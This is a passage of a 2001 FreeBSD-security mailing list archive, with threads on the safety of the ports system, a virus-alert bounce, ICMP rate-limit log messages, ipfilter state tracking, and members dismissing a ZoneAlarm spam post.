X-Mailer: KMail [version 1.2] Cc: "FreeBSD Questions" , References: <014201c17336$40653f90$0a00000a@atkielski.com> <03a801c17399$ba011c30$0a00000a@atkielski.com> In-Reply-To: <03a801c17399$ba011c30$0a00000a@atkielski.com> MIME-Version: 1.0 Message-Id: <01112312354202.00791@i8k.babbleon.org> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thursday 22 November 2001 16:07, Anthony Atkielski wrote: > Alas! This does not make me feel warm and fuzzy! It's a good thing I'm > not installing this at a bank. If I were installing FreeBSD at a bank, I would not install from ports or over the network at all; I'd get the installation CDs and then track the security-fixes track. And I'd wait at least a month after the new release before installing it so wait for any potential problem to get shaken out. A maximally safe system is fundamentally incompatible with a maximally "cool" or "up to date" system. That said, the ports are surely a lot safer than any Windows-based system; the MD5 give you some assurance that it is what you think it is, Unixy systems are less of a magnet for malware, and the source *is* available; even if you don't scan it, others will. If you don't like to live dangerously, then follow this simple rule: Download the ports but wait at least a week before you actually upgrade or install any of them, and watch the ports and other lists in the meantime. If there are severe problems, somebody else will find them & post. > > ----- Original Message ----- > From: "Gary W. Swearingen" > To: "Anthony Atkielski" > Cc: "FreeBSD Questions" ; > > Sent: Thursday, November 22, 2001 22:00 > Subject: Re: setuid on nethack? > > > "Anthony Atkielski" writes: > > > When I add ports and stuff to my system, sometimes they are picked up > > > from > > some > > > > bizarre FTP sites, and in cases where the executables do not have to be > > trusted, > > > > some guidelines on how better to secure them would be welcome. I know > > > that often they are being rebuilt from source before installation, but > > > it isn't really practical to read through the source for every port > > > just to look for suspicious code. > > > > I've also worried about this sort of thing since learning the ports > > system last winter. There's a lot of downloading and running of scripts > > as root going on and it's scary, especially after you've spent many days > > tring to improve your security. A few more observations on the subject: > > > > The main defense seems to be the fear of being tracked down by hackers > > more skillful than most crackers, aided by the use of MD5 to verify that > > you're installing the same thing that someone else has already installed > > and found (with meager testing, sadly, but necessarily) to work OK. > > > > I've read of little vandalware on FreeBSD (or Linux). The risk seems > > acceptable for most people, at least those who do backups. There also > > might not be any less risky practical alternatives for many. > > > > If one learns the details of the ports system, one can do all or most of > > the ports stuff as a regular user, downloading, building, and installing > > to non-standard, non-root-protected directories. Someone posted some > > clues about this on -questions (or -stable?) withing the last couple of > > weeks, but I can't find my copy of it. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- Brian T. Schellenberger . . . . . . . bts@wnt.sas.com (work) Brian, the man from Babble-On . . . . bts@babbleon.org (personal) http://www.babbleon.org -------> Free Dmitry Sklyarov! (let him go home) <----------- http://www.eff.org http://www.programming-freedom.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 10:51:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from horse10.daimi.au.dk (horse10.daimi.au.dk [130.225.18.250]) by hub.freebsd.org (Postfix) with ESMTP id EF13A37B405 for ; Fri, 23 Nov 2001 10:51:18 -0800 (PST) Received: (from root@localhost) by horse10.daimi.au.dk (8.11.6/8.11.6) id fANIpHU22358; Fri, 23 Nov 2001 19:51:17 +0100 Date: Fri, 23 Nov 2001 19:51:17 +0100 From: postmaster@daimi.au.dk Message-Id: <200111231851.fANIpHU22358@horse10.daimi.au.dk> To: Subject: VIRUS IN YOUR MAIL Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org V I R U S A L E R T Our viruschecker found the 'W32/Aliz-A' virus(es) in your email to the following recipient(s): -> Please check your system for viruses, or ask your system administrator to do so. For your reference, here are the headers from your email: ------------------------- BEGIN HEADERS ----------------------------- Received: from speedy.iie.cnam.fr (system@speedy.iie.cnam.fr [192.70.23.7]) by mbone.iie.cnam.fr (8.9.3/8.9.3) with SMTP id TAA22812 for ; Fri, 23 Nov 2001 19:48:26 +0100 (MET) From: security@FreeBSD.ORG Received: by rubis.iie.cnam.fr (MX V4.2 AXP) id 3; Fri, 23 Nov 2001 19:48:39 MET Date: Fri, 23 Nov 2001 19:48:37 MET To: freebsd-security-digest@FreeBSD.ORG Message-ID: <00A057E0.4E8B70BC.3@rubis.iie.cnam.fr> Subject: security-digest V5 #350 -------------------------- END HEADERS ------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 11: 3:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsas1i.audiotel.com.ar (host030038.prima.com.ar [200.42.30.38]) by hub.freebsd.org (Postfix) with ESMTP id 18E8F37B405 for ; Fri, 23 Nov 2001 11:03:33 -0800 (PST) Received: from audi2k (audi2k.audiotel.com.ar [192.168.100.237]) (authenticated) by bsas1i.audiotel.com.ar (8.11.6/8.11.6) with ESMTP id fANJ3Uj50027 for ; Fri, 23 Nov 2001 16:03:30 -0300 (ART) From: "Fernando Germano" To: Subject: What's this? Date: Fri, 23 Nov 2001 16:04:02 -0300 Message-ID: <006c01c17451$9d97aa60$ed64a8c0@audi2k> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've found many of these, are these the result of a portscan or something like that???, how do you read this line??? Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps Thanks you Fernando To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 12: 7:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from teardrop.ca (d141-197-100.home.cgocable.net [24.141.197.100]) by hub.freebsd.org (Postfix) with ESMTP id 2B7D137B405 for ; Fri, 23 Nov 2001 12:07:15 -0800 (PST) Received: from teardrop.ca (cfikoswz@teardrop.ca [24.141.197.100]) by teardrop.ca (8.11.6/8.11.6) with ESMTP id fANK75v19051; Fri, 23 Nov 2001 15:07:05 -0500 (EST) (envelope-from teardrop@teardrop.ca) X-Authentication-Warning: teardrop.ca: mail owned process doing -bs Date: Fri, 23 Nov 2001 15:07:05 -0500 (EST) From: Paul Miseiko To: Fernando Germano Cc: security@FreeBSD.ORG Subject: Re: What's this? In-Reply-To: <006c01c17451$9d97aa60$ed64a8c0@audi2k> Message-ID: <20011123150438.G18954-100000@teardrop.ca> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The result of a ICMP flood, i'd imagine. You set ICMP_BANDLIM in the kernel. Paul Miseiko /\/ esoteric@EFNet /\/ http://teardrop.ca On Fri, 23 Nov 2001, Fernando Germano wrote: > > I've found many of these, are these the result of a portscan or something > like that???, how do you read this line??? > > Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps > Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps > > > Thanks you > Fernando > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 12:16:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from rly-ip01.mx.aol.com (rly-ip01.mx.aol.com [205.188.156.49]) by hub.freebsd.org (Postfix) with ESMTP id 7E2BD37B405 for ; Fri, 23 Nov 2001 12:16:24 -0800 (PST) Received: from logs-wc.proxy.aol.com (logs-wc.proxy.aol.com [205.188.193.5]) by rly-ip01.mx.aol.com (8.8.8/8.8.8/AOL-5.0.0) with ESMTP id PAA22539 for ; Fri, 23 Nov 2001 15:16:03 -0500 (EST) Received: from blah (AC8B2D93.ipt.aol.com [172.139.45.147]) by logs-wc.proxy.aol.com (8.10.0/8.10.0) with SMTP id fANKB6Z320888 for ; Fri, 23 Nov 2001 15:11:07 -0500 (EST) Message-Id: <200111232011.fANKB6Z320888@logs-wc.proxy.aol.com> Date: Fri, 23 Nov 2001 20:27:22 +0100 To: security@freebsd.org From: eberkut Subject: Re: What's this? Organization: CNS / Minithins X-Mailer: Opera 5.11 build 904b X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Apparently-From: SinkSuffering@aol.com Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 23/11/01 20:04:02, "Fernando Germano" a écrit: >I've found many of these, are these the result of a portscan or something >like that???, how do you read this line??? > >Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps >Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps Your kernel tells you that there is something provoking him to send more responses that he should according to the sysctl limits at net.inet.icmp.icmplim. 187/264 is the number of packets that the kernel would have sent if there was'nt the limit, 100 is the limit and pps means packet par second. This message could result of a portscan or a DoS (or a too small limit considering the traffic). see net.inet.icmp.icmplim to modify the limit and set net.inet.icmp.icmplim_output=0 to turn off the error messages. --eberkut ex diffinientium cognitione diffiniti resultat cognitio . Prelude : http://prelude.sf.net . CNS : http://minithins.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 14:20:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 1F0B237B418 for ; Fri, 23 Nov 2001 14:20:51 -0800 (PST) Received: (qmail 13793 invoked by uid 1000); 23 Nov 2001 22:20:48 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Nov 2001 22:20:48 -0000 Date: Fri, 23 Nov 2001 16:20:48 -0600 (CST) From: Mike Silbersack To: Fernando Germano Cc: Subject: Re: What's this? In-Reply-To: <006c01c17451$9d97aa60$ed64a8c0@audi2k> Message-ID: <20011123161855.U13774-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 23 Nov 2001, Fernando Germano wrote: > I've found many of these, are these the result of a portscan or something > like that???, how do you read this line??? > > Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps > Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps > > Thanks you > Fernando It's probably just a portscan. Do not worry about it. Instead, worry about the fact that you're running an old release, and consider upgrading to 4.4 for the zillion other (legitimate) security issues that have been fixed. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 5:15:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from sj1-3-3-9.iserver.com (sj1-3-3-9.iserver.com [128.121.212.42]) by hub.freebsd.org (Postfix) with ESMTP id 7429037B417 for ; Sat, 24 Nov 2001 05:15:21 -0800 (PST) Received: (qmail 59325 invoked by uid 14746); 24 Nov 2001 13:13:53 -0000 Received: from unknown (HELO comp-lib.org) ([unknown]) (envelope-sender ) by unknown (qmail-ldap-1.03) with SMTP for ; 24 Nov 2001 13:13:53 -0000 Message-ID: <3BFF9D53.CBB692E2@comp-lib.org> Date: Sat, 24 Nov 2001 05:14:59 -0800 From: "Michael M. Butler" X-Mailer: Mozilla 4.7 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: abuse@freebsd.org Cc: security@FreeBSD.ORG Subject: Re: some shit to see References: <200111230926.fAN9Qw630403@peony.ezo.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Nuke this turkey, won't you? Thanks! :) jflowers@ezo.net wrote: > > peace > > Name: whatever.exe > whatever.exe Type: WAV Audio (audio/x-wav) > Encoding: base64 -- My moronic mnemonic for smart behavior: "DICKS" == diplomacy, integrity, courage, kindness, skepticism. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 6:30:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from d13225.upc-d.chello.nl (d13225.upc-d.chello.nl [213.46.13.225]) by hub.freebsd.org (Postfix) with ESMTP id 4CFF637B405 for ; Sat, 24 Nov 2001 06:30:34 -0800 (PST) Received: from adv.devet.org (adv.devet.org [192.168.1.2]) by d13225.upc-d.chello.nl (Postfix) with ESMTP id E033368CE; Sat, 24 Nov 2001 15:30:32 +0100 (CET) Received: by adv.devet.org (Postfix, from userid 100) id 4EDC83E9E; Sat, 24 Nov 2001 15:30:28 +0100 (CET) Date: Sat, 24 Nov 2001 15:30:28 +0100 To: kzaraska@student.uci.agh.edu.pl Cc: security@freebsd.org Subject: Re: Best security topology for FreeBSD Message-ID: <20011124153028.A2567@adv.devet.org> References: <20011121183151.B15275@heresy.dreamflow.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.22.1i Organization: Eindhoven, the Netherlands From: devet@devet.org (Arjan de Vet) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article you write: >On Wed, 21 Nov 2001, Bart Matthaei wrote: >> I still dont see why ipf would be better when it comes to filtering. >This issue (at least in one aspect) has been discussed on this list around >Oct 30 (thread about keep-state and ICMP). The discussion strayed from the >original topic and someone pointed out that ipfilter does a more careful >inspection when dealing with dynamic rules (checks TCP sequence numbers >etc.). See the paper written by Guido van Rooij: http://www.madison-gurkha.com/publications/tcp_filtering/tcp_filtering.ps It explains how IP-filter deals with seq/ack numbers and window sizes. Note that IP-filter does not have the notion of real 'dynamic' rules but a state table instead. Arriving packets are first matched to the state table (a quick lookup in a hash table) and in case they match (read the paper to find the exact details) passed on without looking in the filter rules. The filter rules are, more or less, only used for determining whether a new connection will be allowed (and thus entered into the state table). Arjan -- Arjan de Vet, Eindhoven, The Netherlands URL : http://www.iae.nl/users/devet/ Work: http://www.madison-gurkha.com/ (Security, Open Source, Education) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 7:43:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from storage.ukr.net (storage.ukr.net [212.42.64.13]) by hub.freebsd.org (Postfix) with ESMTP id 3F79837B41B for ; Sat, 24 Nov 2001 07:43:48 -0800 (PST) Envelope-to: freebsd-security@freebsd.org Received: from UKR.NET's mail service, abuse contact: abuse@ukr.net with local ID 167ewQ-000M7F-00 by storage.ukr.net; Sat, 24 Nov 2001 17:42:06 +0200 Received: from [195.184.192.73] by storage.ukr.net with HTTP; Sat, 24 Nov 2001 15:42:06 +0000 (GMT) From: "sdkghgh ihidhguhg" To: freebsd-security@freebsd.org Subject: Security zone Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: chernov.dipt.donetsk.ua [195.184.192.73] Reply-To: "sdkghgh ihidhguhg" Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Message-Id: Date: Sat, 24 Nov 2001 17:42:06 +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, All! That you think about this protection? http://zonealarm.co-ltd.com/ "ZoneAlarm Pro version 2.6 is the only Internet security solution that automatically blocks known and unknown threats barricading your computer against outside intrusions and attacks. The award-winning ZoneAlarm Pro provides home users, small-business owners and remote employees with the highest level of protection. ZoneAlarm Pro-security you can trust." Sincerely, Yours To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 8:57: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from theinternet.com.au (c2731.kelvn1.qld.optusnet.com.au [203.164.207.8]) by hub.freebsd.org (Postfix) with ESMTP id DEDF137B419 for ; Sat, 24 Nov 2001 08:52:43 -0800 (PST) Received: (from akm@localhost) by theinternet.com.au (8.11.6/8.11.4) id fAOGqeG14092 for freebsd-security@FreeBSD.ORG; Sun, 25 Nov 2001 02:52:40 +1000 (EST) (envelope-from akm) Date: Sun, 25 Nov 2001 02:52:39 +1000 From: Andrew Kenneth Milton To: freebsd-security@FreeBSD.ORG Subject: Re: Security zone Message-ID: <20011125025239.C12912@zeus.theinternet.com.au> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from sdkghgh ihidhguhg on Sat, Nov 24, 2001 at 05:42:06PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org +-------[ sdkghgh ihidhguhg ]---------------------- | Hi, All! | | That you think about this protection? | | http://zonealarm.co-ltd.com/ | "ZoneAlarm Pro version 2.6 is the only Internet security solution that | automatically blocks | known and unknown threats barricading your computer against outside | intrusions and attacks. It's doing this right now for my computer! Wow! That's Amazing! I didn't have to do anything, that really is automatic. -- Totally Holistic Enterprises Internet| | Andrew Milton The Internet (Aust) Pty Ltd | | ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au| To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 12:36: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from atkielski.com (atkielski.com [161.58.232.69]) by hub.freebsd.org (Postfix) with ESMTP id DA91537B418 for ; Sat, 24 Nov 2001 12:32:00 -0800 (PST) Received: from contactdish (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by atkielski.com (8.11.6) id fAOKVR034379; Sat, 24 Nov 2001 21:31:27 +0100 (CET) Message-ID: <002a01c17526$fe708ac0$0a00000a@atkielski.com> From: "Anthony Atkielski" To: "Andrew Kenneth Milton" , References: <20011125025239.C12912@zeus.theinternet.com.au> Subject: Re: Security zone Date: Sat, 24 Nov 2001 21:31:21 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ZoneAlarm isn't available for FreeBSD, or any other flavor of UNIX. UNIX has much better ways of protecting the system, anyway. Also, the basic version of ZoneAlarm is free for the download (even though the URL below doesn't mention this), although it looks like ZoneLabs is hoping that European visitors to their site are too clueless to discover this (and they are probably right). ----- Original Message ----- From: "Andrew Kenneth Milton" To: Sent: Saturday, November 24, 2001 17:52 Subject: Re: Security zone > +-------[ sdkghgh ihidhguhg ]---------------------- > | Hi, All! > | > | That you think about this protection? > | > | http://zonealarm.co-ltd.com/ > | "ZoneAlarm Pro version 2.6 is the only Internet security solution that > | automatically blocks > | known and unknown threats barricading your computer against outside > | intrusions and attacks. > > It's doing this right now for my computer! Wow! That's Amazing! I didn't have > to do anything, that really is automatic. > > -- > Totally Holistic Enterprises Internet| | Andrew Milton > The Internet (Aust) Pty Ltd | | > ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au| > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 12:49:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.ip.pt (zibelina2.ip.pt [195.23.132.46]) by hub.freebsd.org (Postfix) with SMTP id 11E4337B418 for ; Sat, 24 Nov 2001 12:45:33 -0800 (PST) Received: (qmail 20024 invoked by uid 509); 24 Nov 2001 20:45:31 -0000 Received: from unknown (HELO mail.ip.pt) (195.23.132.40) by zibelina2.ip.pt with SMTP; 24 Nov 2001 20:45:31 -0000 Received: (qmail 30848 invoked from network); 24 Nov 2001 20:45:31 -0000 Received: from unknown (HELO enterprise) ([213.205.68.138]) (envelope-sender ) by solha.ip.pt (qmail-ldap-1.03) with SMTP for ; 24 Nov 2001 20:45:31 -0000 Message-ID: <004601c17528$a6ad2030$01000001@enterprise> Reply-To: =?Windows-1252?Q?Jos=E9_Azevedo?= From: =?Windows-1252?Q?Jos=E9_Azevedo?= To: "Anthony Atkielski" , "Andrew Kenneth Milton" , References: <20011125025239.C12912@zeus.theinternet.com.au> <002a01c17526$fe708ac0$0a00000a@atkielski.com> Subject: Re: Security zone Date: Sat, 24 Nov 2001 20:43:19 -0000 Organization: Indomabilis MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Actually, Zone Alarm and any other firewall solutions for Windows suck big time. The packet drop varies a lot, but in some cases it just jams the stack to very slow. And i don't recall fully-auto solutions as a good way for security. Althought, it's nice enough to cover a lot of little holes. Don't bet your money on them. ----- Original Message ----- From: "Anthony Atkielski" To: "Andrew Kenneth Milton" ; Sent: Saturday, November 24, 2001 8:31 PM Subject: Re: Security zone > ZoneAlarm isn't available for FreeBSD, or any other flavor of UNIX. UNIX has > much better ways of protecting the system, anyway. > > Also, the basic version of ZoneAlarm is free for the download (even though the > URL below doesn't mention this), although it looks like ZoneLabs is hoping that > European visitors to their site are too clueless to discover this (and they are > probably right). > > ----- Original Message ----- > From: "Andrew Kenneth Milton" > To: > Sent: Saturday, November 24, 2001 17:52 > Subject: Re: Security zone > > > > +-------[ sdkghgh ihidhguhg ]---------------------- > > | Hi, All! > > | > > | That you think about this protection? > > | > > | http://zonealarm.co-ltd.com/ > > | "ZoneAlarm Pro version 2.6 is the only Internet security solution that > > | automatically blocks > > | known and unknown threats barricading your computer against outside > > | intrusions and attacks. > > > > It's doing this right now for my computer! Wow! That's Amazing! I didn't have > > to do anything, that really is automatic. > > > > -- > > Totally Holistic Enterprises Internet| | Andrew Milton > > The Internet (Aust) Pty Ltd | | > > ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon > > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au| > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 14:30:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1BABC37B405 for ; Sat, 24 Nov 2001 14:30:34 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA29191; Sat, 24 Nov 2001 15:30:09 -0700 (MST) Message-Id: <4.3.2.7.2.20011124152809.048c57c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 24 Nov 2001 15:30:03 -0700 To: "sdkghgh ihidhguhg" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Security zone In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org More spam. Ugh. By the way, ZoneAlarm (which is available only for Windows) has many bugs. At times, it freezes your IP stack and won't let you click on a button that's supposed to un-freeze it. Its network buffers gradually consume all available memory and the system crashes. --Brett At 08:42 AM 11/24/2001, sdkghgh ihidhguhg wrote: >Hi, All! > >That you think about this protection? > >http://zonealarm.co-ltd.com/ >"ZoneAlarm Pro version 2.6 is the only Internet security solution that >automatically blocks >known and unknown threats barricading your computer against outside >intrusions and attacks. >The award-winning ZoneAlarm Pro provides home users, small-business owners >and remote employees with >the highest level of protection. ZoneAlarm Pro-security you can >trust." > >Sincerely, Yours > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 15:11:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 2FEB937B405 for ; Sat, 24 Nov 2001 15:11:37 -0800 (PST) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C066C66B27; Sat, 24 Nov 2001 15:11:36 -0800 (PST) Date: Sat, 24 Nov 2001 15:11:36 -0800 From: Kris Kennaway To: sdkghgh ihidhguhg Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security zone Message-ID: <20011124151136.B28070@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="vGgW1X5XWziG23Ko" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from nateukraine@ukr.net on Sat, Nov 24, 2001 at 05:42:06PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --vGgW1X5XWziG23Ko Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Nov 24, 2001 at 05:42:06PM +0200, sdkghgh ihidhguhg wrote: > Hi, All! >=20 > That you think about this protection? >=20 > http://zonealarm.co-ltd.com/ > "ZoneAlarm Pro version 2.6 is the only Internet security solution that > automatically blocks > known and unknown threats barricading your computer against outside > intrusions and attacks. > The award-winning ZoneAlarm Pro provides home users, small-business owners > and remote employees with > the highest level of protection. ZoneAlarm Pro-security you can > trust." It's basically a lie; you can do all this and more under FreeBSD. Kris --vGgW1X5XWziG23Ko Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8ACkoWry0BWjoQKURAsmmAKCAlUkp8h5ouiGadjOtRiYC8Mnl3gCeNo4S UioMg5es+yQPy1ccM1i9VLo= =Feue -----END PGP SIGNATURE----- --vGgW1X5XWziG23Ko-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 24 15:33: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 621D637B417 for ; Sat, 24 Nov 2001 15:33:02 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA29584; Sat, 24 Nov 2001 16:32:38 -0700 (MST) Message-Id: <4.3.2.7.2.20011124162959.04085de0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 24 Nov 2001 16:32:34 -0700 To: Kris Kennaway From: Brett Glass Subject: Re: Security zone Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20011124151136.B28070@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:11 PM 11/24/2001, Kris Kennaway wrote: >It's basically a lie; you can do all this and more under FreeBSD. FreeBSD 